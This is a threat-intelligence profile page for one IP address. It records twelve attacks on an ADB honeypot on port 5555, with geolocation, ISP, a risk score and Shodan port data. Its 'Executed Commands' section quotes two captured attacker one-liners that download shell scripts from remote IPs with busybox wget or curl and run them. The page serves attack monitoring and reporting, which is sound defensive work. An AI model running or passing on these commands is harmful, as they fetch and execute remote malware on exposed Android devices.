TROYANOSYVIRUS
Active ThreatLOW

176.65.139.61

Country of Origin🇱🇺 LU
First Detection5/1/2026
Last Activity5/3/2026
ISPOffshore LC
🎯
12
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
0
Malware

Geolocation

Country
🇱🇺 LU
City
Unknown
ASN
AS214472
ISP
Offshore LC

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp/; busybox wget http://176.65.139.61/bb.sh; sh bb.sh; curl http://176.65.139.61/bb.sh; sh bb.sh3x
$cd /data/local/tmp/; busybox wget http://31.211.189.87/adbbb.sh; sh adbbb.sh; curl http://31.211.189.87/adbcc.sh; sh adbcc.sh1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Risk Assessment

20
/100
LowMediumHighCritical